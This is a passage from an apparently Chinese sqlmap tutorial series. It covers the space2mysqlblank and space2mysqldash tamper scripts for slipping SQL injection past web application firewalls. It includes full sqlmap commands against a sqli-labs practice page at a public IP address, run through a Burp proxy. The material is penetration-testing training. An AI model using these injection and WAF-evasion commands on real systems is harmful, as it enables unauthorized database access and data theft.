sqlmap从入门到精通-第七章-7-21 绕过WAF脚本-space2mysqlblank.py&space2mysqldash.py

44. space2mysqlblank.py脚本

通过随机空白字符替换payload中的空格，适用于mysql数据库

测试地址：python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="space2mysqlblank.py" --proxy="http://127.0.0.1:8080" -batch

显示能够判断出来了注入点，但是不能够注入成功出数据，我们看看burp的抓包情况

sqlmap从入门到精通-第七章-7-21 绕过WAF脚本-space2mysqlblank.py&space2mysqldash.py

效果是达到了，添加%09,%0A,%0C,%0D,%0B

===================================================================================================================================================

45. space2mysqldash.py脚本

使用"--"加一个换行符替换空格，适用于mysql和mssql

测试地址：python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="space2mysqldash.py" --proxy="http://127.0.0.1:8080" -batch

sqlmap从入门到精通-第七章-7-21 绕过WAF脚本-space2mysqlblank.py&space2mysqldash.py

可以成功注入，看burp抓包情况

sqlmap从入门到精通-第七章-7-21 绕过WAF脚本-space2mysqlblank.py&space2mysqldash.py

效果很明显加了--和换行符替换了空格